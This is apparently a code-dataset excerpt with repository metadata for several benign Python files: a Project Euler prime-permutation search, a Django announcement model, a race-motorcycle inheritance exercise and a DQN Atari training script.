# For each 4-digit prime a, look for an arithmetic progression
# a, a+inc, a+2*inc of primes whose digits are permutations of each
# other (Project Euler problem 49).  Python 2 print syntax preserved.
for a in range(1000, 10000):
    if isprime[a]:
        code = encode(a)
        # inc < 4500 guarantees a + 2*inc can stay below 10000.
        for inc in range(1, 4500):
            b = a + inc
            c = a + inc * 2
            if c >= 10000:
                break
            if isprime[b] and isprime[c]:
                # Same digit signature => (heuristically) same digits.
                if encode(b) == code and encode(c) == code:
                    print a, b, c
| 62 | 0 | 23 |
9ad449957441de10a4ab92d15ddf24c511bdb3ab | 324 | py | Python | cms/models.py | silencemind/Department-Managment-System | e39a28e5043344d323a4af639dca7e79c888f259 | [
"PostgreSQL"
] | 1 | 2020-12-10T15:04:59.000Z | 2020-12-10T15:04:59.000Z | cms/models.py | silencemind/College-Managment-System | e39a28e5043344d323a4af639dca7e79c888f259 | [
"PostgreSQL"
] | 5 | 2020-11-04T07:49:11.000Z | 2021-06-10T20:22:10.000Z | cms/models.py | silencemind/Department-Managment-System | e39a28e5043344d323a4af639dca7e79c888f259 | [
"PostgreSQL"
] | null | null | null | from django.db import models
from datetime import datetime
# date = models.DateField(default=datetime.date.today)
| 23.142857 | 61 | 0.660494 | from django.db import models
from datetime import datetime
class announcments(models.Model):
    """A site-wide announcement message.

    NOTE(review): the class name should be PascalCase (``Announcement``),
    but renaming a Django model requires a migration, so it is left as-is.
    """

    msg = models.CharField(max_length=200, null=True)  # announcement text
    date = models.DateField(null=True)  # date the announcement applies to
    # date = models.DateField(default=datetime.date.today)

    def __str__(self):
        # BUG FIX: msg is nullable and Django requires __str__ to return
        # a str (e.g. in the admin), so fall back to an empty string.
        return self.msg or ""
| 25 | 113 | 62 |
69ab91afef13f6535ec6cb06a7794d0211e4c9bf | 126 | py | Python | inheritance/need_for_speed/project/race_motorcycle.py | lowrybg/PythonOOP | 1ef5023ca76645d5d96b8c4fb9a54d0f431a1947 | [
"MIT"
] | null | null | null | inheritance/need_for_speed/project/race_motorcycle.py | lowrybg/PythonOOP | 1ef5023ca76645d5d96b8c4fb9a54d0f431a1947 | [
"MIT"
] | null | null | null | inheritance/need_for_speed/project/race_motorcycle.py | lowrybg/PythonOOP | 1ef5023ca76645d5d96b8c4fb9a54d0f431a1947 | [
"MIT"
] | null | null | null | from project.motorcycle import Motorcycle
| 21 | 41 | 0.793651 | from project.motorcycle import Motorcycle
class RaceMotorcycle(Motorcycle):
    """Race motorcycle; only overrides the default fuel consumption."""

    # NOTE(review): annotated as float but assigned the int 8 — the value
    # is kept as-is to avoid changing formatted output; confirm intent.
    DEFAULT_FUEL_CONSUMPTION: float = 8
065c36d678b37e87f02d2042268e88eb0f4fc4f8 | 2,260 | py | Python | experiment.py | meetjannik/deep-q-network | a6d01817e8b53591c5aa09018d9831d1f06b7f47 | [
"MIT"
] | 1 | 2022-03-25T13:22:41.000Z | 2022-03-25T13:22:41.000Z | experiment.py | meetjannik/dqn | a6d01817e8b53591c5aa09018d9831d1f06b7f47 | [
"MIT"
] | null | null | null | experiment.py | meetjannik/dqn | a6d01817e8b53591c5aa09018d9831d1f06b7f47 | [
"MIT"
] | null | null | null | import argparse
import logging
import os
from src.algorithm import deep_q_learning
from torch.utils.tensorboard import SummaryWriter
import warnings
import gym
from src.agent import DQNAgent
from src.environment import DQNEnvironment
from datetime import datetime
if __name__ == '__main__':
    # Train and evaluate a DQN agent on a fixed list of Atari games,
    # logging the best average episode score per game.
    parser = argparse.ArgumentParser()

    # Hyper-parameters; see Extended Data Table 1 of the DQN paper.
    # `type=` is given explicitly so that values supplied on the command line
    # are parsed as numbers -- without it, argparse would pass them through as
    # strings while the defaults below are ints/floats.
    parser.add_argument('--mini_batch_size', type=int, default=32)
    parser.add_argument('--replay_memory_size', type=int, default=100000)  # 1000000
    parser.add_argument('--agent_history_length', type=int, default=4)
    parser.add_argument('--target_update_frequency', type=int, default=10000)  # target_network_update_frequency
    parser.add_argument('--gamma', type=float, default=0.99)  # discount factor
    parser.add_argument('--action_repeat', type=int, default=4)
    parser.add_argument('--update_frequency', type=int, default=4)
    parser.add_argument('--learning_rate', type=float, default=0.00025)
    parser.add_argument('--gradient_momentum', type=float, default=0.95)
    parser.add_argument('--squared_gradient_momentum', type=float, default=0.95)
    parser.add_argument('--min_squared_gradient', type=float, default=0.01)
    parser.add_argument('--epsilon_start', type=float, default=1)  # initial_epsilon
    parser.add_argument('--epsilon_end', type=float, default=0.1)  # final_epsilon
    parser.add_argument('--epsilon_decay', type=int, default=1000000)  # final_epsilon_frame
    parser.add_argument('--replay_start_size', type=int, default=25000)  # 50000
    parser.add_argument('--max_n_wait_actions', type=int, default=30)  # no_op_max

    # Evaluation protocol; see caption of Extended Data Table 3.
    parser.add_argument('--n_training_steps', type=int, default=10000000)
    parser.add_argument('--evaluation_frequency', type=int, default=250000)
    parser.add_argument('--n_evaluation_steps', type=int, default=135000)
    args = parser.parse_args()

    # NOTE(review): gym's canonical Atari id is 'SpaceInvaders' (capital I);
    # confirm that deep_q_learning / the environment wrapper normalizes the
    # casing of 'Spaceinvaders' before changing it here.
    games = ['Breakout', 'Enduro', 'Riverraid', 'Seaquest', 'Spaceinvaders']

    for game in games:
        # One experiment per game, named with today's date for easy grouping.
        experiment_name = datetime.today().strftime('%Y-%m-%d') + '_' + game

        # NoFrameskip - ensures no frames are skipped by the emulator
        # v4 - ensures actions are executed, whereas v0 would ignore an action with 0.25 probability
        max_avg_episode_score = deep_q_learning(environment_name=game, experiment_name=experiment_name, args=args)
        print(f'{game} Score: {max_avg_episode_score}')
| 42.641509 | 114 | 0.74115 | import argparse
import logging
import os
from src.algorithm import deep_q_learning
from torch.utils.tensorboard import SummaryWriter
import warnings
import gym
from src.agent import DQNAgent
from src.environment import DQNEnvironment
from datetime import datetime
if __name__ == '__main__':
    # Train and evaluate a DQN agent on a fixed list of Atari games,
    # logging the best average episode score per game.
    parser = argparse.ArgumentParser()

    # Hyper-parameters; see Extended Data Table 1 of the DQN paper.
    # `type=` is given explicitly so that values supplied on the command line
    # are parsed as numbers -- without it, argparse would pass them through as
    # strings while the defaults below are ints/floats.
    parser.add_argument('--mini_batch_size', type=int, default=32)
    parser.add_argument('--replay_memory_size', type=int, default=100000)  # 1000000
    parser.add_argument('--agent_history_length', type=int, default=4)
    parser.add_argument('--target_update_frequency', type=int, default=10000)  # target_network_update_frequency
    parser.add_argument('--gamma', type=float, default=0.99)  # discount factor
    parser.add_argument('--action_repeat', type=int, default=4)
    parser.add_argument('--update_frequency', type=int, default=4)
    parser.add_argument('--learning_rate', type=float, default=0.00025)
    parser.add_argument('--gradient_momentum', type=float, default=0.95)
    parser.add_argument('--squared_gradient_momentum', type=float, default=0.95)
    parser.add_argument('--min_squared_gradient', type=float, default=0.01)
    parser.add_argument('--epsilon_start', type=float, default=1)  # initial_epsilon
    parser.add_argument('--epsilon_end', type=float, default=0.1)  # final_epsilon
    parser.add_argument('--epsilon_decay', type=int, default=1000000)  # final_epsilon_frame
    parser.add_argument('--replay_start_size', type=int, default=25000)  # 50000
    parser.add_argument('--max_n_wait_actions', type=int, default=30)  # no_op_max

    # Evaluation protocol; see caption of Extended Data Table 3.
    parser.add_argument('--n_training_steps', type=int, default=10000000)
    parser.add_argument('--evaluation_frequency', type=int, default=250000)
    parser.add_argument('--n_evaluation_steps', type=int, default=135000)
    args = parser.parse_args()

    # NOTE(review): gym's canonical Atari id is 'SpaceInvaders' (capital I);
    # confirm that deep_q_learning / the environment wrapper normalizes the
    # casing of 'Spaceinvaders' before changing it here.
    games = ['Breakout', 'Enduro', 'Riverraid', 'Seaquest', 'Spaceinvaders']

    for game in games:
        # One experiment per game, named with today's date for easy grouping.
        experiment_name = datetime.today().strftime('%Y-%m-%d') + '_' + game

        # NoFrameskip - ensures no frames are skipped by the emulator
        # v4 - ensures actions are executed, whereas v0 would ignore an action with 0.25 probability
        max_avg_episode_score = deep_q_learning(environment_name=game, experiment_name=experiment_name, args=args)
        print(f'{game} Score: {max_avg_episode_score}')
| 0 | 0 | 0 |